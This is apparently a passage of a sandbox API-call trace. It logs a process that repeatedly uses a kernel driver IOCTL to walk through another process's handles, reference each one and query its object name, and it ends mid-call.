returned 0x364b20 [0225.236] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.236] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.236] PsAcquireProcessExitSynchronization () returned 0x0 [0225.237] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.237] ObReferenceObjectByHandle (in: Handle=0xb30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800213ecd0, HandleInformation=0x0) returned 0x0 [0225.237] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.237] PsReleaseProcessExitSynchronization () returned 0x2 [0225.237] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.237] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.237] ObfDereferenceObject (Object=0xfffffa800213ecd0) returned 0x1 [0225.237] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.237] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.237] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.237] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.237] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.237] PsAcquireProcessExitSynchronization () returned 0x0 [0225.237] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.238] ObReferenceObjectByHandle (in: Handle=0xb34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017f3da0, HandleInformation=0x0) returned 0x0 [0225.238] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.238] PsReleaseProcessExitSynchronization () returned 0x2 [0225.238] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.238] ObQueryNameString (in: Object=0xfffff8a0017f3da0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.238] ObfDereferenceObject (Object=0xfffff8a0017f3da0) returned 0x1 [0225.238] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.238] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.238] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.238] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0225.238] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.238] PsAcquireProcessExitSynchronization () returned 0x0 [0225.238] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.238] ObReferenceObjectByHandle (in: Handle=0xb38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020b4f20, HandleInformation=0x0) returned 0x0 [0225.238] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.238] PsReleaseProcessExitSynchronization () returned 0x2 [0225.238] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.238] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.238] ObfDereferenceObject (Object=0xfffffa80020b4f20) returned 0x1 [0225.238] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.238] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.238] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.238] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.238] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.238] PsAcquireProcessExitSynchronization () returned 0x0 [0225.239] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.239] ObReferenceObjectByHandle (in: Handle=0xb3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001541910, HandleInformation=0x0) returned 0x0 [0225.239] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.239] PsReleaseProcessExitSynchronization () returned 0x2 [0225.239] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.239] ObQueryNameString (in: Object=0xfffff8a001541910, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.239] ObfDereferenceObject (Object=0xfffff8a001541910) returned 0x1 [0225.239] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.239] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.239] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.239] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0225.239] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.239] PsAcquireProcessExitSynchronization () returned 0x0 [0225.239] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.239] ObReferenceObjectByHandle (in: Handle=0xb40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800200fcb0, HandleInformation=0x0) returned 0x0 [0225.239] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.239] PsReleaseProcessExitSynchronization () returned 0x2 [0225.239] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.239] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.239] ObfDereferenceObject (Object=0xfffffa800200fcb0) returned 0x1 [0225.239] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.239] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.239] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.239] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.239] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.239] PsAcquireProcessExitSynchronization () returned 0x0 [0225.240] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.240] ObReferenceObjectByHandle (in: Handle=0xb44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001819120, HandleInformation=0x0) returned 0x0 [0225.240] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.240] PsReleaseProcessExitSynchronization () returned 0x2 [0225.240] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.240] ObQueryNameString (in: Object=0xfffff8a001819120, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.240] ObfDereferenceObject (Object=0xfffff8a001819120) returned 0x1 [0225.240] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.240] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.240] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.240] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.240] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.240] PsAcquireProcessExitSynchronization () returned 0x0 [0225.240] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.240] ObReferenceObjectByHandle (in: Handle=0xb48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800203e570, HandleInformation=0x0) returned 0x0 [0225.240] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.240] PsReleaseProcessExitSynchronization () returned 0x2 [0225.240] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.240] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.240] ObfDereferenceObject (Object=0xfffffa800203e570) returned 0x1 [0225.240] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.240] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.240] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.240] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.240] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.240] PsAcquireProcessExitSynchronization () returned 0x0 [0225.241] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.241] ObReferenceObjectByHandle (in: Handle=0xb4c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001819ac0, HandleInformation=0x0) returned 0x0 [0225.241] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.241] PsReleaseProcessExitSynchronization () returned 0x2 [0225.241] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.241] ObQueryNameString (in: Object=0xfffff8a001819ac0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.241] ObfDereferenceObject (Object=0xfffff8a001819ac0) returned 0x1 [0225.241] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.241] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.241] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.241] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0225.241] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.241] PsAcquireProcessExitSynchronization () returned 0x0 [0225.241] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.241] ObReferenceObjectByHandle (in: Handle=0x11f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028508b0, HandleInformation=0x0) returned 0x0 [0225.241] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.241] PsReleaseProcessExitSynchronization () returned 0x2 [0225.241] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.241] ObQueryNameString (in: Object=0xfffffa80028508b0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.241] ObfDereferenceObject (Object=0xfffffa80028508b0) returned 0x11 [0225.241] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.241] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.241] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.241] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0225.241] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.241] PsAcquireProcessExitSynchronization () returned 0x0 [0225.241] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.242] ObReferenceObjectByHandle (in: Handle=0x1234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002525f20, HandleInformation=0x0) returned 0x0 [0225.242] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.242] PsReleaseProcessExitSynchronization () returned 0x2 [0225.242] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.242] ObQueryNameString (in: Object=0xfffffa8002525f20, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.242] ObfDereferenceObject (Object=0xfffffa8002525f20) returned 0x11 [0225.242] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.242] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.242] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.242] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0225.242] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.242] PsAcquireProcessExitSynchronization () returned 0x0 [0225.242] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.242] ObReferenceObjectByHandle (in: Handle=0x1240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800254f960, HandleInformation=0x0) returned 0x0 [0225.242] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.242] PsReleaseProcessExitSynchronization () returned 0x2 [0225.242] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.242] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.242] ObfDereferenceObject (Object=0xfffffa800254f960) returned 0x1 [0225.242] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.242] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.242] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.242] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0225.242] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.242] PsAcquireProcessExitSynchronization () returned 0x0 [0225.243] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.243] ObReferenceObjectByHandle (in: Handle=0x1248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80025536e0, HandleInformation=0x0) returned 0x0 [0225.243] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.243] PsReleaseProcessExitSynchronization () returned 0x2 [0225.243] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.243] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.243] ObfDereferenceObject (Object=0xfffffa80025536e0) returned 0x1 [0225.243] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.243] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.243] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.243] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.243] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.243] PsAcquireProcessExitSynchronization () returned 0x0 [0225.243] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.243] ObReferenceObjectByHandle (in: Handle=0x1290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b618a0, HandleInformation=0x0) returned 0x0 [0225.243] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.243] PsReleaseProcessExitSynchronization () returned 0x2 [0225.243] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.243] ObQueryNameString (in: Object=0xfffff8a001b618a0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.243] ObfDereferenceObject (Object=0xfffff8a001b618a0) returned 0x1 [0225.243] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.243] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.244] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.244] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.244] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.244] PsAcquireProcessExitSynchronization () returned 0x0 [0225.244] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.244] ObReferenceObjectByHandle (in: Handle=0x1294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b9c6c0, HandleInformation=0x0) returned 0x0 [0225.244] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.244] PsReleaseProcessExitSynchronization () returned 0x2 [0225.244] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.244] ObQueryNameString (in: Object=0xfffff8a001b9c6c0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.244] ObfDereferenceObject (Object=0xfffff8a001b9c6c0) returned 0x1 [0225.244] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.244] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.244] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.244] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0225.244] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.244] PsAcquireProcessExitSynchronization () returned 0x0 [0225.244] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.244] ObReferenceObjectByHandle (in: Handle=0x1298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036d2730, HandleInformation=0x0) returned 0x0 [0225.244] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.244] PsReleaseProcessExitSynchronization () returned 0x2 [0225.244] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.244] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.244] ObfDereferenceObject (Object=0xfffffa80036d2730) returned 0x2 [0225.244] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.245] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.245] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.245] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0225.245] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.245] PsAcquireProcessExitSynchronization () returned 0x0 [0225.245] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.245] ObReferenceObjectByHandle (in: Handle=0x12a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, 